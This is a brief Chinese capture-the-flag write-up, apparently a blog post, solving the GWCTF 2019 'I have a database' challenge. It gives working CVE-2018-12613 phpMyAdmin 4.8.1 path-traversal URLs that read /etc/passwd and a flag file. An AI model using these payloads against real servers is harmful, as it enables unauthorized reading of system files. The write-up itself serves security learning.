[GWCTF 2019]我有一个数据库

双层小牛堡2023-09-12 23:45

过来毛都没有

直接dirsearch 扫一下

发现存在 phpadmin 我们直接访问一下

啥都没有 但是给我们了 phpadmin的版本

我们去搜搜看是否存在漏洞

phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)_phpmyadmin cve-2018-12613漏洞获取webshell_zhang三的博客-CSDN博客

发现还真有 我们直接复现即可

复制代码 
/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
复制代码 
phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag
相关推荐
芯盾时代6 分钟前
企业建立安全防线治理失控的Agent
大数据·人工智能·安全
hz5678918 分钟前
公安局远程办案用什么音视频系统?安全取证与多方协同方案
安全·架构·云计算·音视频·实时音视频·信息与通信
汇智信科24 分钟前
机务安全虚拟教学系统 打造沉浸式实训
安全·汇智信科·机务安全
Yukinaaaa35 分钟前
以“轮盘数组”思维彻底搞懂并实现阻塞队列
java·服务器·ide·安全·javaee·阻塞队列·轮盘数组
TechWayfarer1 小时前
IP画像在企业安全中的应用:它能做什么?不能替代什么
网络·python·tcp/ip·安全·网络安全
科技风向标go2 小时前
QYResearch联合发布:《2026室外网络摄像头行业白皮书》格行视精灵成用户室外硬核环境首选监控
大数据·网络·安全·监控·户外安防
格图素书3 小时前
AI安全攻防深度解析|Prompt注入与越狱攻击全拆解、供应链投毒风险深挖,助力大模型应用加固、RAG风控、全链路安全防控落地
人工智能·安全·prompt
Safeploy安策数据3 小时前
等保测评总卡壳?PCI加密卡如何破解政务云与金融合规难题
运维·网络·安全
2401_873479403 小时前
如何用IP离线库检测DNS隧道和C2通信?企业DNS安全防护指南
网络·数据库·tcp/ip·安全·ip
星幻元宇VR4 小时前
消防教育基地展厅设备【消防知识安全竞赛系统】
人工智能·科技·学习·安全
热门推荐
01【AI】2026 年具身智能模型和世界模型总结02GitHub 镜像站点03Codex 下载安装指南:Windows 和 macOS 官方版下载04《置身钉内》原文-可播放阅读052026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf062026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?07AI科技热点日报 | 2026年6月1日08【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法09CC-Switch 下载、安装与使用配置指南【2026.5.29】10Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析